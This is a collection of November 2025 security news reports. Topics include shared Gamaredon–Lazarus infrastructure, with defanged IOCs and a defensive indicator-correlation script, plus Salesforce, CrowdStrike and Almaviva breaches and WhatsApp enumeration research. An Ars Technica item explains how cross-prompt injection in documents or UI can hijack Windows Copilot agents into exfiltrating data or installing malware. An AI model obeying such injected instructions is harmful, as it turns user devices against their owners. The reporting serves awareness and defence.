CISA strongly encourages messaging app users to review the updated Mobile Communications Best Practice Guidance and Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society for steps to protect mobile communications and messaging apps, as well as mitigations against spyware.
Gen Blogs | gendigital.com
Threat Research Team
November 19, 2025
State-sponsored hacking groups typically operate in isolation, each advancing its own nation’s goals. That’s why any sign of collaboration between them is cause for concern. Yet new evidence uncovered by Gen researchers suggests that two of the world’s most aggressive advanced persistent threat (APT) actors, Russia-aligned Gamaredon and North Korea’s Lazarus, may be operating on shared infrastructure.
This discovery hints at something much bigger than mere technical overlap. It points to a possible new stage in cyber conflict, where geopolitical alliances are mirrored in shared digital operations.
From allies on the battlefield to partners online
Russia and North Korea have maintained a long-standing partnership rooted in shared political and military interests. Moscow backed Pyongyang during and after the Korean War, and in 2024 both nations renewed that alliance through a Comprehensive Strategic Partnership that includes mutual defense commitments.
Since 2022, Pyongyang has stepped up its support for Moscow, formally recognizing Russian-claimed territories in Ukraine and reportedly supplying munitions and troops. In 2024, Reuters reported that North Korean soldiers had been deployed to fight alongside Russian forces in Ukraine, a striking example of the two countries’ deepening cooperation.
Now, we may be witnessing a digital extension of that alliance. On July 28, 2025, Gen’s internal monitoring systems detected a suspicious event linking Gamaredon and Lazarus activity through a shared IP address. The implications are significant: two state-backed actors from different countries may be coordinating at an operational level.
This development aligns with broader patterns highlighted in the Q3/2025 Threat Report, where state sponsored operations showed increasing sophistication, coordination, and diversification of infrastructure. While those observations were confined within national ecosystems, the Gamaredon–Lazarus overlap suggests that similar dynamics may now be emerging across national boundaries.
Background
Gamaredon
Gamaredon is a Russian-aligned APT active since at least 2013, primarily focused on cyber espionage. In 2021, the Security Service of Ukraine issued a press release, attributing several members of the group as part of Russia's Federal Security Service (FSB) 18th Information Security Center. Since its official inception, the group is believed to have conducted more than 5000 cyber-attacks, most of which targeted Ukrainian government agencies. However, with the onset of war in Ukraine, ESET reported that Gamaredon expanded its operations to include NATO member states, likely aiming to disrupt military aid to Ukraine, underscoring the group’s prioritization of hybrid warfare.
Lazarus
Lazarus is a state-sponsored threat actor active since 2009 and widely believed to operate under North Korea’s government. Initially focused on cyber espionage and destructive attacks, Lazarus later shifted toward financially motivated operations to fund future campaigns. In 2021, the United States Department of Justice indicted three members believed to be part of the Lazarus group, connecting them to North Korea’s Reconnaissance General Bureau (RGB), the country’s primary intelligence agency. With the rise of cryptocurrency, Lazarus increasingly targeted digital assets, as evidenced by high-profile breaches such as Stake.com ($41 million), AtomicWallet ($100 million), WazirX ($235 million), and Bybit ($1.4 billion).
Where Gamaredon spies, Lazarus steals, but both ultimately serve their governments’ strategic interests.
The discovery: a shared digital footprint
Just one day after the announcement of new direct flights between Moscow and Pyongyang, Gen identified indicators of a potential collaboration between the Gamaredon and Lazarus APTs. On July 24, 2025, our system tracking Gamaredon’s Command-and-Control (C2) servers via known Telegram and Telegraph channels blocked an IP address:
144[.]172[.]112[.]106
Four days later, during a routine check, the same server was found hosting an obfuscated version of InvisibleFerret (SHA256: 128da948f7c3a6c052e782acfee503383bf05d953f3db5c603e4d386e2cf4b4d), a malware strain attributed to Lazarus. The payload matched Lazarus’ tooling and was delivered through an identical server structure (URL: http[://]144[.]172[.]112[.]106/payload/99/81) previously seen in ContagiousInterview, a Lazarus campaign that targeted job seekers with fake recruitment messages. While the IP could represent a proxy or VPN endpoint, the temporal proximity of both groups’ activity and the shared hosting pattern indicate probable infrastructure reuse, with moderate confidence of operational collaboration. Whether Lazarus leveraged a Gamaredon-controlled server or both actors shared the same client instance remains unclear, but the overlap is too close to ignore.
Implications for the global threat landscape
Cross-country collaborations in the APT ecosystem remain exceptionally rare. The last widely acknowledged example dates back to 2014 with the Regin malware, reportedly co-developed by the U.S. National Security Agency (NSA) and the U.K.’s Government Communications Headquarters (GCHQ).
If confirmed, the Gamaredon–Lazarus overlap would represent the first known case of Russian–North Korean cyber collaboration in the wild.
Such a partnership could have wide-ranging implications:
Operational synergy: Lazarus’s expertise in monetizing cyberattacks through cryptocurrency theft could help Gamaredon fund or conceal future operations.
Strategic alignment: Russia, facing mounting economic and military pressure, could benefit from North Korea’s established infrastructure for covert financial operations.
Escalation potential: This kind of collaboration blurs the line between espionage, sabotage, and organized cybercrime, expanding both nations’ offensive reach.
Not an isolated case: national ecosystems are merging
While cross-border APT collaboration is rare, cooperation within national ecosystems has become increasingly common.
Lazarus x Kimsuky
Kimsuky is another North Korean APT group. It has been active since around 2012 and assessed by Mandiant to operate under the RGB. The group specializes in advanced cyber-espionage campaigns, primarily targeting government entities and consumer-facing organizations.
During analysis of Lazarus’ ContagiousInterview payloads, Gen researchers found that an IP address (216[.]219[.]87[.]41) later reappeared in Kimsuky-linked payloads (e.g., cce27340fd6f32d96c65b7b1034c65d5026d7d0b96c80bcf31e40ab4b8834bcd). This suggests infrastructure reuse or coordination between RGB units, evidence of alignment at North Korea’s national level.
DoNot x SideWinder
DoNot and SideWinder are state-sponsored APT groups believed to have been active since 2013 and 2012, respectively, both with ties to the Indian government and a primary focus on cyber espionage.
Gen identified a DoNot-attributed payload (8bb089d763d5d4b4f96ae59eb9d8f919e6a49611c183f636bfd5c01696447938) that later executed a known SideWinder loader (f4d10604980f8f556440460adc71883f04e24231d0a9a3a323a86651405bedfb). The victim was located in Pakistan, consistent with the typical targeting profile of both groups. This cooperation resembles the previously observed Gamaredon x Turla collaboration, indicating that intra-country partnerships are becoming a tactical norm.
A new phase in cyber geopolitics
The evidence of infrastructure overlap between Lazarus and Gamaredon represents a significant development in the global threat landscape. Historically, cross-country APT collaborations have been exceedingly rare, with only a handful of confirmed cases such as Stuxnet and Regin. This potential partnership signals a shift toward more complex and unpredictable alliances, where geopolitical interests may drive operational convergence.
While the Lazarus–Gamaredon case stands out for its strategic implications, the observed intranational collaborations, such as Lazarus with Kimsuky and DoNot with SideWinder, are equally important. These partnerships demonstrate a growing trend of resource sharing and tactical alignment within national ecosystems, amplifying the reach and resilience of state-sponsored campaigns.
For defenders, these findings underscore an urgent need to adapt detection strategies beyond single-actor attribution. Shared infrastructure, overlapping TTPs, and modular malware frameworks mean that traditional attribution models may fail to capture the full scope of risk. Security teams must:
Enhance infrastructure correlation analysis to detect cross-group overlaps early.
Prioritize intelligence sharing across organizations and sectors to identify emerging alliances.
Implement layered defenses capable of mitigating diverse tactics from multiple threat actors leveraging common resources.
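The infrastructure correlation the first recommendation calls for can be automated over an ordinary indicator feed. The following is an added example, not code from the Gen report: it normalizes defanged indicators, groups sightings by indicator, and flags any indicator attributed to two or more distinct groups whose sightings fall within a configurable window. The sample feed is constructed; the two IP addresses and the July 24/28, 2025 dates for 144.172.112.106 are taken from the article, while the dates for 216.219.87.41 and the 203.0.113.7 entry (an RFC 5737 documentation address used as a same-group control) are assumed for illustration.

```python
"""Cross-group infrastructure correlation over an IOC feed.

Added example, not code from the Gen report: flag indicators that appear
under more than one group attribution within a time window, the kind of
overlap the article describes for Gamaredon/Lazarus and Lazarus/Kimsuky.
"""
from collections import defaultdict
from datetime import date

# Constructed feed. Indicators and the July 2025 Gamaredon/Lazarus dates are
# from the article; the 216.219.87.41 dates and the 203.0.113.7 control entry
# are assumed for illustration.
SAMPLE_FEED = [
    {"indicator": "144[.]172[.]112[.]106", "group": "Gamaredon", "seen": "2025-07-24"},
    {"indicator": "144[.]172[.]112[.]106", "group": "Lazarus", "seen": "2025-07-28"},
    {"indicator": "216[.]219[.]87[.]41", "group": "Lazarus", "seen": "2025-06-10"},   # date assumed
    {"indicator": "216[.]219[.]87[.]41", "group": "Kimsuky", "seen": "2025-08-05"},   # date assumed
    {"indicator": "203.0.113.7", "group": "Gamaredon", "seen": "2025-05-02"},         # constructed control
    {"indicator": "203.0.113.7", "group": "Gamaredon", "seen": "2025-05-09"},         # same group: no overlap
]


def refang(indicator: str) -> str:
    """Normalize defanged notation ('[.]', '[://]', 'hxxp') so the same host
    matches across reports that defang differently."""
    s = indicator.strip().lower()
    for defanged, clean in (("[.]", "."), ("(.)", "."), ("[://]", "://"), ("[:]//", "://")):
        s = s.replace(defanged, clean)
    if s.startswith("hxxp"):
        s = "http" + s[4:]
    return s


def find_shared_infrastructure(feed, window_days=90):
    """Return indicators attributed to two or more distinct groups whose
    sightings fall within window_days of each other.

    Result shape: {indicator: {"groups": [...], "min_gap_days": int,
                               "sightings": [(group, date), ...]}}
    """
    sightings = defaultdict(list)
    for rec in feed:
        sightings[refang(rec["indicator"])].append(
            (rec["group"], date.fromisoformat(rec["seen"])))

    overlaps = {}
    for ind, seen in sightings.items():
        seen.sort(key=lambda gs: gs[1])
        # Gaps between every pair of sightings that carry different attributions.
        gaps = [
            (later[1] - earlier[1]).days
            for i, earlier in enumerate(seen)
            for later in seen[i + 1:]
            if earlier[0] != later[0]
        ]
        if not gaps or min(gaps) > window_days:
            continue  # single-group indicator, or cross-group sightings too far apart
        overlaps[ind] = {
            "groups": sorted({g for g, _ in seen}),
            "min_gap_days": min(gaps),
            "sightings": seen,
        }
    return overlaps


def report(overlaps) -> str:
    """Render overlaps as text, tightest temporal proximity first."""
    lines = []
    for ind, info in sorted(overlaps.items(), key=lambda kv: kv[1]["min_gap_days"]):
        lines.append(f"{ind}: {' + '.join(info['groups'])} "
                     f"(closest sightings {info['min_gap_days']} days apart)")
        for group, seen in info["sightings"]:
            lines.append(f"    {seen.isoformat()}  {group}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(find_shared_infrastructure(SAMPLE_FEED)))
```

The window parameter is the analyst's knob: the article treats a four-day gap as strong evidence of reuse, while sightings months apart on a rented VPS are more likely unrelated tenants, so the default of 90 days is an assumption to tune against your own feed's dwell times.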
The era of isolated APT operations is fading. As adversaries evolve through collaboration, defenders must respond with equal agility and cooperation to safeguard critical assets.
Ars Technica - arstechnica.com
Dan Goodin Senior Security Editor
Nov. 19, 2025 21:25
Integration of Copilot Actions into Windows is off by default, but for how long?
Microsoft’s warning on Tuesday that an experimental AI agent integrated into Windows can infect devices and pilfer sensitive user data has set off a familiar response from security-minded critics: Why is Big Tech so intent on pushing new features before their dangerous behaviors can be fully understood and contained?
As reported Tuesday, Microsoft introduced Copilot Actions, a new set of “experimental agentic features” that, when enabled, perform “everyday tasks like organizing files, scheduling meetings, or sending emails,” and provide “an active digital collaborator that can carry out complex tasks for you to enhance efficiency and productivity.”
Hallucinations and prompt injections apply
The fanfare, however, came with a significant caveat. Microsoft recommended users enable Copilot Actions only “if you understand the security implications outlined.”
The admonition is based on known defects inherent in most large language models, including Copilot, as researchers have repeatedly demonstrated.
One common defect of LLMs causes them to provide factually erroneous and illogical answers, sometimes even to the most basic questions. This propensity for hallucinations, as the behavior has come to be called, means users can’t trust the output of Copilot, Gemini, Claude, or any other AI assistant and instead must independently confirm it.
Another common LLM landmine is the prompt injection, a class of bug that allows hackers to plant malicious instructions in websites, resumes, and emails. LLMs are programmed to follow directions so eagerly that they are unable to discern those in valid user prompts from those contained in untrusted, third-party content created by attackers. As a result, the LLMs give the attackers the same deference as users.
Both flaws can be exploited in attacks that exfiltrate sensitive data, run malicious code, and steal cryptocurrency. So far, these vulnerabilities have proved impossible for developers to prevent and, in many cases, can only be fixed using bug-specific workarounds developed once a vulnerability has been discovered.
That, in turn, led to this whopper of a disclosure in Microsoft’s post from Tuesday:
“As these capabilities are introduced, AI models still face functional limitations in terms of how they behave and occasionally may hallucinate and produce unexpected outputs,” Microsoft said. “Additionally, agentic AI applications introduce novel security risks, such as cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation.”
Microsoft indicated that only experienced users should enable Copilot Actions, which is currently available only in beta versions of Windows. The company, however, didn’t describe what type of training or experience such users should have or what actions they should take to prevent their devices from being compromised. I asked Microsoft to provide these details, and the company declined.
Like “macros on Marvel superhero crack”
Some security experts questioned the value of the warnings in Tuesday’s post, comparing them to warnings Microsoft has provided for decades about the danger of using macros in Office apps. Despite the long-standing advice, macros have remained among the lowest-hanging fruit for hackers out to surreptitiously install malware on Windows machines. One reason for this is that Microsoft has made macros so central to productivity that many users can’t do without them.
“Microsoft saying ‘don’t enable macros, they’re dangerous’… has never worked well,” independent researcher Kevin Beaumont said. “This is macros on Marvel superhero crack.”
Beaumont, who is regularly hired to respond to major Windows network compromises inside enterprises, also questioned whether Microsoft will provide a means for admins to adequately restrict Copilot Actions on end-user machines or to identify machines in a network that have the feature turned on.
A Microsoft spokesperson said IT admins will be able to enable or disable an agent workspace at both account and device levels, using Intune or other MDM (Mobile Device Management) apps.
Critics voiced other concerns, including the difficulty for even experienced users to detect exploitation attacks targeting the AI agents they’re using.
“I don’t see how users are going to prevent anything of the sort they are referring to, beyond not surfing the web I guess,” researcher Guillaume Rossolini said.
Microsoft has stressed that Copilot Actions is an experimental feature that’s turned off by default. That design was likely chosen to limit its access to users with the experience required to understand its risks. Critics, however, noted that previous experimental features—Copilot, for instance—regularly become default capabilities for all users over time. Once that’s done, users who don’t trust the feature are often required to invest time developing unsupported ways to remove the features.
Sound but lofty goals
Most of Tuesday’s post focused on Microsoft’s overall strategy for securing agentic features in Windows. Goals for such features include:
Non-repudiation, meaning all actions and behaviors must be “observable and distinguishable from those taken by a user”
Agents must preserve confidentiality when they collect, aggregate, or otherwise utilize user data
Agents must receive user approval when accessing user data or taking actions
The goals are sound, but ultimately they depend on users reading the dialog windows that warn of the risks and require careful approval before proceeding. That, in turn, diminishes the value of the protection for many users.
“The usual caveat applies to such mechanisms that rely on users clicking through a permission prompt,” Earlence Fernandes, a University of California, San Diego professor specializing in AI security, told Ars. “Sometimes those users don’t fully understand what is going on, or they might just get habituated and click ‘yes’ all the time. At which point, the security boundary is not really a boundary.”
As demonstrated by the rash of “ClickFix” attacks, many users can be tricked into following extremely dangerous instructions. While more experienced users (including a fair number of Ars commenters) blame the victims falling for such scams, these incidents are inevitable for a host of reasons. In some cases, even careful users are fatigued or under emotional distress and slip up as a result. Other users simply lack the knowledge to make informed decisions.
Microsoft’s warning, one critic said, amounts to little more than a CYA (short for cover your ass), a legal maneuver that attempts to shield a party from liability.
“Microsoft (like the rest of the industry) has no idea how to stop prompt injection or hallucinations, which makes it fundamentally unfit for almost anything serious,” critic Reed Mideke said. “The solution? Shift liability to the user. Just like every LLM chatbot has a ‘oh by the way, if you use this for anything important be sure to verify the answers’ disclaimer, never mind that you wouldn’t need the chatbot in the first place if you knew the answer.”
As Mideke indicated, most of the criticisms extend to AI offerings other companies—including Apple, Google, and Meta—are integrating into their products. Frequently, these integrations begin as optional features and eventually become default capabilities whether users want them or not.
bleepingcomputer.com
By Bill Toulas
November 20, 2025
Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva.
The hacker claims to have stolen 2.3 terabytes of data and leaked it on a dark web forum. According to the threat actor's description, the leak includes confidential documents and sensitive company information.
Almaviva is a large Italian company that operates globally, providing services such as software design and development, system integration, IT consulting, and customer relationship management (CRM) products.
Andrea Draghetti, Head of Cyber Threat Intelligence at D3Lab, says the leaked data is recent, and includes documents from the third quarter of 2025. The expert ruled out the possibility that the files were recycled from a Hive ransomware attack in 2022.
"The threat actor claims the material includes internal shares, multi-company repositories, technical documentation, contracts with public entities, HR archives, accounting data, and even complete datasets from several FS Group companies," Draghetti says.
"The structure of the dump, organized into compressed archives by department/company, is fully consistent with the modus operandi of ransomware groups and data brokers active in 2024–2025," the cybersecurity expert added.
Almaviva is a major IT services provider with over 41,000 employees across almost 80 branches in Italy and abroad, and an annual turnover of $1.4 billion last year.
FS Italiane Group (FS) is a 100% state-owned railway operator and one of the largest industrial companies in the country, with more than $18 billion in annual revenue. It manages railway infrastructure, passenger and freight rail transport, and also bus services and logistics chains.
While BleepingComputer’s press requests to both Almaviva and FS went unanswered, the IT firm eventually confirmed the breach via a statement to local media.
“In recent weeks, the services dedicated to security monitoring identified and subsequently isolated a cyberattack that affected our corporate systems, resulting in the theft of some data,” Almaviva said.
“Almaviva immediately activated security and counter-response procedures through its specialized team for this type of incident, ensuring the protection and full operability of critical services.”
The company also stated that it has informed authorities in the country, including the police, the national cybersecurity agency, and the country’s data protection authority. An investigation into the incident is ongoing with help and guidance from government agencies.
Almaviva promised to transparently provide updates as more information emerges from the investigation.
Currently, it is unclear if passenger information is present in the data leak or if the data breach is impacting other clients beyond FS.
BleepingComputer has contacted Almaviva with additional questions, but we have not received a response by publication time.
bleepingcomputer.com
By Sergiu Gatlan
November 21, 2025
American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.
However, the company noted that its systems were not breached as a result of this incident and that customers' data was not compromised.
"We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally," a CrowdStrike spokesperson told BleepingComputer today.
"Our systems were never compromised and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies."
CrowdStrike did not specify the threat group responsible for the incident or the motivations of the malicious insider who shared screenshots.
However, this statement was provided in response to questions from BleepingComputer regarding screenshots of CrowdStrike systems that were recently posted on Telegram by members of the threat groups ShinyHunters, Scattered Spider, and Lapsus$.
ShinyHunters told BleepingComputer earlier today that they allegedly agreed to pay the insider $25,000 to provide them with access to CrowdStrike's network.
The threat actors claimed they ultimately received SSO authentication cookies from the insider, but by then, the suspected insider had already been detected by CrowdStrike, which had shut down his network access.
The extortion group added that they also attempted to purchase CrowdStrike reports on ShinyHunters and Scattered Spider, but did not receive them.
BleepingComputer contacted CrowdStrike again to confirm if this information is accurate and will update the story if we receive additional information.
The Scattered Lapsus$ Hunters cybercrime collective
These groups, now collectively calling themselves "Scattered Lapsus$ Hunters," have previously launched a data-leak site to extort dozens of companies impacted by a massive wave of Salesforce breaches.
Scattered Lapsus$ Hunters have been targeting Salesforce customers in voice phishing attacks since the start of the year, breaching companies such as Google, Cisco, Allianz Life, Farmers Insurance, Qantas, Adidas, Workday, as well as LVMH subsidiaries, including Dior, Louis Vuitton, and Tiffany & Co.
Companies they attempted to extort include high-profile brands and organizations, such as Google, Cisco, Toyota, Instacart, Cartier, Adidas, Saks Fifth Avenue, Air France & KLM, FedEx, Disney/Hulu, Home Depot, Marriott, Gap, McDonald's, Walgreens, Transunion, HBO MAX, UPS, Chanel, and IKEA.
Scattered Lapsus$ Hunters also claimed responsibility for the Jaguar Land Rover (JLR) breach, stealing sensitive data and significantly disrupting operations, resulting in damages of over £196 million ($220 million) in the last quarter.
As BleepingComputer reported this week, the ShinyHunters and Scattered Spider extortion groups are switching to a new ransomware-as-a-service platform named ShinySp1d3r, after previously using other ransomware gangs' encryptors in attacks, including ALPHV/BlackCat, RansomHub, Qilin, and DragonForce.
This Thursday, ShinyHunters also claimed a new wave of data theft attacks that allegedly impacted Salesforce instances belonging to over 280 companies. In Telegram messages today, they said the list of breached companies contains multiple high-profile names, including LinkedIn, GitLab, Atlassian, Thomson Reuters, Verizon, F5, SonicWall, DocuSign, and Malwarebytes.
As the threat actors told BleepingComputer yesterday, they compromised the Salesforce instances after breaching Gainsight using secrets stolen in the Salesloft drift breach.
therecord.media
Alexander Martin
November 21st, 2025
Two U.K. teenagers pleaded not guilty to hacking the Transport for London agency in 2024 — an attack attributed to the Scattered Spider cybercrime group.
Two British teenagers charged with Computer Misuse Act offenses over a cyberattack on Transport for London (TfL) last year pleaded not guilty during a court appearance on Friday.
Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September. They appeared at London's Southwark Crown Court on Friday to enter their pleas.
Flowers had initially been arrested over the transit agency attack in September 2024, but released on bail. Both men were remanded into custody following the most recent arrest.
The NCA said following Flowers’ arrest in 2024 that its officers discovered additional potential evidence that the suspect had been involved in attacks against U.S. healthcare companies.
Alongside the TfL incident, Flowers faces two additional charges of conspiring with others to infiltrate and damage the networks of SSM Health Care Corporation and attempting to do the same to Sutter Health in the United States. He pleaded not guilty to these charges too.
Jubair faces an additional charge for refusing to provide investigators with passcodes to access devices seized from him. The Crown Prosecution Service (CPS) did not immediately respond to explain the current status of this charge.
The U.S. Department of Justice also unsealed a complaint against Jubair in September, accusing him of computer crimes.
The specific charges against both men are among the most severe in English law for cyber offenses, specifically “conspiracy to commit an unauthorised act in relation to a computer causing / creating risk of serious damage to human welfare/national security,” the maximum sentence for which is life imprisonment.
At the time of their arrest, Paul Foster, the head of the NCA’s National Cyber Crime Unit, said: “Today’s charges are a key step in what has been a lengthy and complex investigation. This attack caused significant disruption and millions in losses to TfL, part of the UK’s critical national infrastructure.”
It follows the NCA warning of an increasing threat from English-speaking cybercriminal groups, including the loose collective tracked as Scattered Spider, which has been associated with a range of attacks in both Britain and the United States.
“The NCA, UK policing and our international partners, including the FBI, are collectively committed to identifying offenders within these networks and ensuring they face justice,” said Foster.
Hannah Von Dadelszen, chief prosecutor at the Crown Prosecution Service (CPS), said: “Our prosecutors have worked to establish that there is sufficient evidence to bring the case to trial and that it is in the public interest to pursue criminal proceedings.”
The charges come as the NCA’s cybercrime unit is understood to be busier than ever in investigating a range of cases. These include the hack against TfL, the Legal Aid Agency, two incidents impacting the National Health Service, and attacks on three retailers — Marks & Spencer, the Co-op, and the London-based luxury store Harrods.
Contempt of court laws prohibit prejudicing a jury trial by suggesting suspects' guilt or innocence, publishing details regarding their past convictions, or speculating about the character of the defendants.
theregister.com
Jessica Lyons
Thu 20 Nov 202
They keep coming back for more
Salesforce has disclosed another third-party breach in which criminals - likely ShinyHunters (again) - may have accessed hundreds of its customers' data.
This time, the suspicious activity involves Gainsight-published applications connected to Salesforce, which are installed and managed directly by customers.
“This activity is likely related to UNC6240 (aka ShinyHunters),” Google Threat Intelligence Group’s principal analyst Austin Larsen told The Register, adding that the threat hunters are “aware of more than 200 potentially affected Salesforce instances.”
"Our investigation indicates this activity may have enabled unauthorized access to certain customers' Salesforce data through the app's connection," the CRM giant said in a security advisory published late Wednesday.
"Per our update, upon detecting the activity, Salesforce revoked all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce and temporarily removed those applications from the AppExchange while our investigation continues," Salesforce spokesperson Allen Tsai told The Register.
Tsai declined to answer specific questions about the breach, including how many customers were compromised - the company has notified those affected, he said - and who is behind the latest theft of Salesforce customers' data.
"There is no indication that this issue resulted from any vulnerability in the Salesforce platform," Tsai said. "The activity appears to be related to the app's external connection to Salesforce."
Gainsight did not immediately respond to The Register's request for comment.
While Salesforce isn't pointing the finger at a particular threat group, Larsen attributed the activity to ShinyHunters. This is the same criminal crew that breached SalesLoft's Drift application earlier this year and stole a bunch of companies' OAuth tokens, which allowed them access to numerous orgs' Salesforce instances.
"Our team at Google Threat Intelligence Group (GTIG) has observed threat actors, tied to ShinyHunters, compromising third-party OAuth tokens to potentially gain unauthorized access to Salesforce customer instances," Larsen said in a LinkedIn post on Thursday.
Google's Mandiant incident response team is working with Salesforce to notify potentially affected organizations, Larsen added, and urged all companies to "view this as a signal to audit their SaaS environments," including conducting regular reviews of all third-party applications connected to their Salesforce instances.
Companies should also "investigate and revoke tokens for unused or suspicious applications," and, upon detecting any anomalous activity, "rotate the credentials immediately," he wrote.
securityweek.com
By Eduard Kovacs
November 13, 2025 (7:54 AM ET)
The UK’s national healthcare system is working with the country’s National Cyber Security Centre to investigate the incident.
Cybercriminals have named the United Kingdom’s National Health Service (NHS) as one of the victims of the recent data theft and extortion campaign targeting organizations that use Oracle’s E-Business Suite (EBS) enterprise resource planning solutions.
“We are aware that the NHS has been listed on a cyber-crime website as being impacted by a cyber-attack, but no data has been published,” a spokesperson for NHS England told SecurityWeek. “Our cyber security team is working closely with the National Cyber Security Centre to investigate.”
The Oracle EBS hacking campaign came to light in early October and within two weeks the cybercriminals started naming victims on the Cl0p ransomware group’s leak website. The hackers have since made public data allegedly stolen from organizations such as Harvard University, American Airlines subsidiary Envoy Air, industrial giants Schneider Electric and Emerson, and The Washington Post.
The NHS is the latest organization named on the Cl0p ransomware leak website, which now lists more than 40 alleged victims of the Oracle EBS campaign. Data allegedly obtained from 25 targets has been published.
One of the victims named in recent days is Hitachi subsidiary GlobalLogic, a provider of digital engineering solutions.
GlobalLogic confirmed this week that the cybercriminals gained access to HR information for current and former employees, including names, addresses, contact information, dates of birth, passport information, Social Security numbers, salary information, and bank account details. The company said the incident impacts more than 10,000 individuals.
A majority of the organizations named on the Cl0p website have yet to confirm or deny being impacted. The list includes major companies such as Logitech, Cox Enterprises, Pan American Silver, LKQ Corporation, and Copeland.
Victims of the Oracle EBS hack are likely conducting investigations and some of them likely do not want to share information until their probes are completed. Others are likely trying to avoid the spotlight by staying silent.
While Cl0p’s history suggests that organizations are rarely listed as victims without cause, the actual scope of the breach may be exaggerated by the threat actors to pressure victims into payment.
TechCrunch
Zack Whittaker
5:09 AM PST · November 17, 2025
The defacement of Protei's website said "another DPI/SORM provider bites the dust," apparently referring to the company selling its web intercept and surveillance products to phone and internet providers.
A Russian telecom company that develops technology to allow phone and internet companies to conduct web surveillance and censorship was hacked, had its website defaced, and had data stolen from its servers, TechCrunch has learned.
Founded in Russia, Protei makes telecommunications systems for phone and internet providers across dozens of countries, including Bahrain, Italy, Kazakhstan, Mexico, Pakistan and much of central Africa. The company, now headquartered in Jordan, sells video conferencing technology and internet connectivity solutions, as well as surveillance equipment and web-filtering products, such as deep packet inspection systems.
It’s not clear exactly when or how Protei was hacked, but a copy of the company’s website saved on the Internet Archive’s Wayback Machine shows it was defaced on November 8. The website was restored soon after.
During the breach, the hacker obtained the contents of Protei’s web server — around 182 gigabytes of files — including emails dating back years.
A copy of Protei’s data was provided to DDoSecrets, a nonprofit transparency collective that indexes leaked datasets in the public interest, including data from law enforcement, government agencies, and companies involved in the surveillance industry.
Mohammad Jalal, the managing director of Protei’s branch in Jordan, did not respond to a request for comment about the breach.
The identity of the hacker is not known, nor their motivations, but the defaced website read: “another DPI/SORM provider bites the dust.” The message likely references the company’s sales of deep packet inspection systems and other internet filtering technology for the Russian-developed lawful intercept system known as SORM.
SORM is the main lawful intercept system used across Russia as well as several other countries that use Russian technology. Phone and internet providers install SORM equipment on their networks, which allows their country’s governments to obtain the contents of calls, text messages, and web browsing data of the networks’ customers.
Deep-packet inspection devices allow telecom companies to identify and filter web traffic depending on its source, such as a social media website or a specific messaging app, and selectively block access. These systems are used for surveillance and censorship in regions where freedom of speech and expression are limited.
The Citizen Lab reported in 2023 that Iranian telecoms giant Ariantel had consulted with Protei about technology for logging internet traffic and blocking access to certain websites. Documents seen and published by The Citizen Lab show that Protei touted its technology’s ability to restrict or block access to websites for specific people or entire swathes of the population.
Reuters reuters.com
Reporting by Charlie Devereux and Aislinn Laing, additional reporting by Emma Pinedo, editing by Andrei Khalip, David Latona and Alexander Smith
MADRID, Nov 19 (Reuters) - Spain's parliament will investigate Meta (META.O) for possible privacy violations of its Facebook and Instagram users, Spanish Prime Minister Pedro Sanchez said on Wednesday.
"In Spain, the law is above any algorithm or any large technology platform. And anyone who violates our rights will pay the consequences," Sanchez said in a statement.
The investigation stems from international research that found Meta had used a hidden mechanism to track the web activity of Android device users, Sanchez's office said.
Meta did not immediately reply to a request for comment.
Spain's investigation into the U.S. tech giant threatens to further sour relations with Washington, which has rounded on Madrid over its failure to meet NATO spending targets and for its friendliness with Beijing.
President Donald Trump's administration has also criticised the EU's Digital Markets Act, which seeks to curb the power of Big Tech, and the Digital Services Act, which requires large online platforms to tackle illegal and harmful content.
Spain's government said Meta may have violated various European Union laws on security and privacy including its General Data Protection Regulation (GDPR), the ePrivacy Directive, the DMA and the DSA.
Meta, which is led by U.S. billionaire Mark Zuckerberg, will be called to testify before a lower house committee, it added.
The company has had several legal clashes with the European Commission, which in preliminary findings in October said Meta and TikTok had breached their legal obligation to grant researchers adequate access to public data.
The Commission fined Meta 798 million euros ($923 million) in 2024 for abusive practices benefiting Facebook Marketplace while in July last year it charged the company for failing to comply with the DMA in its new pay or consent advertising model.
univie.ac.at
University of Vienna
18.11.2025
IT-Security Researchers from the University of Vienna and SBA Research identified and responsibly disclosed a large-scale privacy weakness in WhatsApp's contact discovery mechanism that allowed the enumeration of 3.5 billion accounts. In collaboration with the researchers, Meta has since addressed and mitigated the issue. The study underscores the importance of continuous, independent security research on widely used communication platforms and highlights the risks associated with the centralization of instant messaging services. The preprint of the study has now been published, and the results will be presented in 2026 at the Network and Distributed System Security (NDSS) Symposium.
WhatsApp's contact discovery mechanism can use a user's address book to find other WhatsApp users by their phone number. Using the same underlying mechanism, the researchers demonstrated that it was possible to query more than 100 million phone numbers per hour through WhatsApp's infrastructure, confirming more than 3.5 billion active accounts across 245 countries. "Normally, a system shouldn't respond to such a high number of requests in such a short time — particularly when originating from a single source," explains lead author Gabriel Gegenhuber from the University of Vienna. "This behavior exposed the underlying flaw, which allowed us to issue an effectively unlimited number of requests to the server and, in doing so, map user data worldwide."
The accessible data items used in the study are the same that are public for anyone who knows a user's phone number and consist of: phone number, public keys, timestamps, and, if set to public, about text and profile picture. From these data points, the researchers were able to extract additional information, which allowed them to infer a user's operating system, account age, as well as the number of linked companion devices. The study shows that even this limited amount of data per user can reveal important information, both on macroscopic and individual levels.
The study also revealed a range of broader insights:
Millions of active WhatsApp accounts were identified in countries where the platform was officially banned, including China, Iran, and Myanmar.
Population-level insights into platform usage, such as the global distribution of Android (81%) versus iOS (19%) devices, regional differences in privacy behavior (e.g., use of public profile pictures or "about" tagline), and variations in user growth across countries.
A small number of cases showed re-use of cryptographic keys across different devices or phone numbers, pointing to potential weaknesses in non-official WhatsApp clients or fraudulent use.
Nearly half of all phone numbers that appeared in the 2021 Facebook data leak of 500 million phone numbers (caused by a scraping incident in 2018) were still active on WhatsApp. This highlights the enduring risks for leaked numbers (e.g., being targeted in scam calls) associated with such exposures.
